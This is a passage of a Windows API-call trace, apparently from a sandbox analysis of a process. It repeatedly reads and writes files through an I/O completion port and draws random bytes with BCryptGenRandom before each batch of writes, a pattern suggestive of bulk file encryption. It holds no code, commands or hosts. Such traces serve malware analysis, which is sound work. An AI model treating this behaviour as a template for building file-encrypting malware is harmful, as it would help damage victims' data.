lpBuffer=0x1fb18f4*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0) returned 1 [0079.882] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0079.904] ReadFile (in: hFile=0x3c4, lpBuffer=0x1fb18f4, nNumberOfBytesToRead=0x2e31e, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0) returned 1 [0079.905] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0079.907] CloseHandle (hObject=0x3c4) returned 1 [0079.912] free (_Block=0x1fb18c0) [0079.912] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0079.923] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0079.923] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0079.923] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x30efc30) returned 0x0 [0079.923] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0079.924] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0079.924] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x30ef970) returned 0x0 [0079.924] calloc (_Count=0x40, _Size=0x4) returned 0x1ff1e60 [0079.924] calloc (_Count=0x41, _Size=0x4) returned 0x77d800 [0079.924] free (_Block=0x1ff1e60) [0079.924] calloc (_Count=0x41, _Size=0x4) returned 0x1ff1e60 [0079.924] calloc (_Count=0x82, _Size=0x4) returned 0x1ff1930 [0079.925] free (_Block=0x1ff1e60) [0079.925] free (_Block=0x1ff1930) [0079.925] free (_Block=0x77d800) [0079.925] WriteFile (in: hFile=0x3c4, lpBuffer=0x1fb18f4*, nNumberOfBytesToWrite=0x618, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0) returned 1 [0079.926] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0079.929] WriteFile (in: hFile=0x3c4, lpBuffer=0x1fb18f4*, nNumberOfBytesToWrite=0x39ea0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0) returned 1 [0079.930] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0079.947] ReadFile (in: hFile=0x3c4, lpBuffer=0x1fb18f4, nNumberOfBytesToRead=0x609, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0) returned 1 [0079.948] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0079.948] CloseHandle (hObject=0x3c4) returned 1 [0079.949] free (_Block=0x1fb18c0) [0079.949] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0079.957] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0079.958] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0079.958] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x30efc30) returned 0x0 [0079.958] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0079.958] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0079.958] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x30ef970) returned 0x0 [0079.959] calloc (_Count=0x40, _Size=0x4) returned 0x1ff1e60 [0079.959] calloc (_Count=0x41, _Size=0x4) returned 0x77d800 [0079.959] free (_Block=0x1ff1e60) [0079.959] calloc (_Count=0x41, _Size=0x4) returned 0x1ff1e60 [0079.959] calloc (_Count=0x82, _Size=0x4) returned 0x1ff1930 [0079.959] free (_Block=0x1ff1e60) [0079.959] free (_Block=0x1ff1930) [0079.959] free (_Block=0x77d800) [0079.959] WriteFile (in: hFile=0x3c4, lpBuffer=0x1fb18f4*, nNumberOfBytesToWrite=0x615, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0) returned 1 [0079.959] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0079.960] WriteFile (in: hFile=0x3c4, lpBuffer=0x1fb18f4*, nNumberOfBytesToWrite=0x23a0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0) returned 1 [0079.960] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0079.975] ReadFile (in: hFile=0x3c4, lpBuffer=0x1fb18f4, nNumberOfBytesToRead=0x559, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0) returned 1 [0079.975] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0079.975] CloseHandle (hObject=0x3c4) returned 1 [0079.980] free (_Block=0x1fb18c0) [0079.980] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0080.021] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0080.021] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0080.021] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x30efc30) returned 0x0 [0080.021] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0080.022] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0080.022] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x30ef970) returned 0x0 [0080.022] calloc (_Count=0x40, _Size=0x4) returned 0x1ff1e60 [0080.022] calloc (_Count=0x41, _Size=0x4) returned 0x77d800 [0080.022] free (_Block=0x1ff1e60) [0080.022] calloc (_Count=0x41, _Size=0x4) returned 0x1ff1e60 [0080.022] calloc (_Count=0x82, _Size=0x4) returned 0x1ff1930 [0080.023] free (_Block=0x1ff1e60) [0080.023] free (_Block=0x1ff1930) [0080.023] free (_Block=0x77d800) [0080.023] WriteFile (in: hFile=0x3c4, lpBuffer=0x1fb18f4*, nNumberOfBytesToWrite=0x61b, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0) returned 1 [0080.023] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0080.029] WriteFile (in: hFile=0x3c4, lpBuffer=0x1fb18f4, nNumberOfBytesToWrite=0x510, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0) returned 0x0 [0080.030] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0080.041] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0080.042] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0080.042] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x30efc30) returned 0x0 [0080.042] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0080.042] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0080.042] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x30ef970) returned 0x0 [0080.043] calloc (_Count=0x40, _Size=0x4) returned 0x1ff1e60 [0080.043] calloc (_Count=0x41, _Size=0x4) returned 0x77d800 [0080.043] free (_Block=0x1ff1e60) [0080.043] calloc (_Count=0x41, _Size=0x4) returned 0x1ff1e60 [0080.043] calloc (_Count=0x82, _Size=0x4) returned 0x3db00b8 [0080.043] free (_Block=0x1ff1e60) [0080.043] free (_Block=0x3db00b8) [0080.043] free (_Block=0x77d800) [0080.043] WriteFile (in: hFile=0x3b4, lpBuffer=0x3d7007c*, nNumberOfBytesToWrite=0x61a, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70048 | out: lpBuffer=0x3d7007c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70048) returned 1 [0080.044] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0080.050] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0080.051] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0080.051] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x30efc30) returned 0x0 [0080.051] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0080.051] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0080.051] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x30ef970) returned 0x0 [0080.052] calloc (_Count=0x40, _Size=0x4) returned 0x1ff1e60 [0080.052] calloc (_Count=0x41, _Size=0x4) returned 0x77d800 [0080.052] free (_Block=0x1ff1e60) [0080.052] calloc (_Count=0x41, _Size=0x4) returned 0x1ff1e60 [0080.052] calloc (_Count=0x82, _Size=0x4) returned 0x3db00b8 [0080.052] free (_Block=0x1ff1e60) [0080.052] free (_Block=0x3db00b8) [0080.052] free (_Block=0x77d800) [0080.052] WriteFile (in: hFile=0x3c0, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x61f, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0080.053] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0080.059] WriteFile (in: hFile=0x3b4, lpBuffer=0x3d7007c*, nNumberOfBytesToWrite=0x1280, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70048 | out: lpBuffer=0x3d7007c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70048) returned 1 [0080.059] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0080.090] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0080.090] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0080.090] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x30efc30) returned 0x0 [0080.090] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0080.091] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0080.091] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x30ef970) returned 0x0 [0080.091] calloc (_Count=0x40, _Size=0x4) returned 0x77d800 [0080.091] calloc (_Count=0x41, _Size=0x4) returned 0x77d908 [0080.091] free (_Block=0x77d800) [0080.091] calloc (_Count=0x41, _Size=0x4) returned 0x1ff1930 [0080.091] calloc (_Count=0x82, _Size=0x4) returned 0x1ff1a40 [0080.092] free (_Block=0x1ff1930) [0080.092] free (_Block=0x1ff1a40) [0080.092] free (_Block=0x77d908) [0080.092] WriteFile (in: hFile=0x3c4, lpBuffer=0x1fb18f4, nNumberOfBytesToWrite=0x61a, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0) returned 0x0 [0080.092] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0080.105] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0080.105] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0080.105] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x30efc30) returned 0x0 [0080.105] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0080.106] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0080.106] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x30ef970) returned 0x0 [0080.109] calloc (_Count=0x40, _Size=0x4) returned 0x77d800 [0080.110] calloc (_Count=0x41, _Size=0x4) returned 0x77d908 [0080.110] free (_Block=0x77d800) [0080.110] calloc (_Count=0x41, _Size=0x4) returned 0x1ff1930 [0080.110] calloc (_Count=0x82, _Size=0x4) returned 0x1ff1a40 [0080.110] free (_Block=0x1ff1930) [0080.110] free (_Block=0x1ff1a40) [0080.110] free (_Block=0x77d908) [0080.110] WriteFile (in: hFile=0x3a0, lpBuffer=0x1ff1e94, nNumberOfBytesToWrite=0x61d, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0080.111] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0080.125] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0080.126] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0080.126] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x30efc30) returned 0x0 [0080.126] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0080.126] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0080.127] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x30ef970) returned 0x0 [0080.127] calloc (_Count=0x40, _Size=0x4) returned 0x77d800 [0080.127] calloc (_Count=0x41, _Size=0x4) returned 0x77d908 [0080.127] free (_Block=0x77d800) [0080.127] calloc (_Count=0x41, _Size=0x4) returned 0x1ff1930 [0080.127] calloc (_Count=0x82, _Size=0x4) returned 0x1ff1a40 [0080.127] free (_Block=0x1ff1930) [0080.128] free (_Block=0x1ff1a40) [0080.128] free (_Block=0x77d908) [0080.128] WriteFile (in: hFile=0x3b4, lpBuffer=0x3d7007c*, nNumberOfBytesToWrite=0x61f, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70048 | out: lpBuffer=0x3d7007c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70048) returned 1 [0080.128] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0080.140] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0080.141] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0080.141] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x30efc30) returned 0x0 [0080.141] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0080.142] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0080.142] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x30ef970) returned 0x0 [0080.146] calloc (_Count=0x40, _Size=0x4) returned 0x77d800 [0080.146] calloc (_Count=0x41, _Size=0x4) returned 0x77d908 [0080.146] free (_Block=0x77d800) [0080.146] calloc (_Count=0x41, _Size=0x4) returned 0x3db00b8 [0080.146] calloc (_Count=0x82, _Size=0x4) returned 0x3db01c8 [0080.146] free (_Block=0x3db00b8) [0080.147] free (_Block=0x3db01c8) [0080.147] free (_Block=0x77d908) [0080.147] WriteFile (in: hFile=0x3ac, lpBuffer=0x2031f04*, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x0, lpOverlapped=0x2031ed0 | out: lpBuffer=0x2031f04*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x2031ed0) returned 1 [0080.147] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0080.148] CloseHandle (hObject=0x3a0) returned 1 [0080.149] free (_Block=0x1ff1e60) [0080.149] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0080.149] CloseHandle (hObject=0x3b4) returned 1 [0080.150] free (_Block=0x3d70048) [0080.150] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0080.150] CloseHandle (hObject=0x3ac) returned 1 [0080.152] free (_Block=0x2031ed0) [0080.156] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0080.162] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0080.162] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0080.162] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x30efc30) returned 0x0 [0080.162] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0080.163] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0080.163] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x30ef970) returned 0x0 [0080.163] calloc (_Count=0x40, _Size=0x4) returned 0x1ff1e60 [0080.163] calloc (_Count=0x41, _Size=0x4) returned 0x77d800 [0080.163] free (_Block=0x1ff1e60) [0080.163] calloc (_Count=0x41, _Size=0x4) returned 0x1ff1e60 [0080.163] calloc (_Count=0x82, _Size=0x4) returned 0x3e30078 [0080.164] free (_Block=0x1ff1e60) [0080.164] free (_Block=0x3e30078) [0080.164] free (_Block=0x77d800) [0080.164] WriteFile (in: hFile=0x3c0, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x61a, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0080.164] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0080.165] WriteFile (in: hFile=0x3c0, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0xf30, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0080.165] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0080.216] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0080.217] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0080.217] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x30efc30) returned 0x0 [0080.217] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0080.217] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0080.217] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x30ef970) returned 0x0 [0080.217] calloc (_Count=0x40, _Size=0x4) returned 0x1ff1e60 [0080.217] calloc (_Count=0x41, _Size=0x4) returned 0x77d800 [0080.218] free (_Block=0x1ff1e60) [0080.218] calloc (_Count=0x41, _Size=0x4) returned 0x1ff1e60 [0080.218] calloc (_Count=0x82, _Size=0x4) returned 0x1ff1930 [0080.218] free (_Block=0x1ff1e60) [0080.218] free (_Block=0x1ff1930) [0080.218] free (_Block=0x77d800) [0080.218] WriteFile (in: hFile=0x3ac, lpBuffer=0x1fb18f4*, nNumberOfBytesToWrite=0x611, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0) returned 1 [0080.218] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0080.219] WriteFile (in: hFile=0x3ac, lpBuffer=0x1fb18f4*, nNumberOfBytesToWrite=0xc90, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0) returned 1 [0080.219] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0080.235] ReadFile (in: hFile=0x3ac, lpBuffer=0x1fb18f4, nNumberOfBytesToRead=0x13c3, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0) returned 1 [0080.236] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0080.236] CloseHandle (hObject=0x3ac) returned 1 [0080.240] free (_Block=0x1fb18c0) [0080.240] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0080.251] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0080.251] GetProcAddress 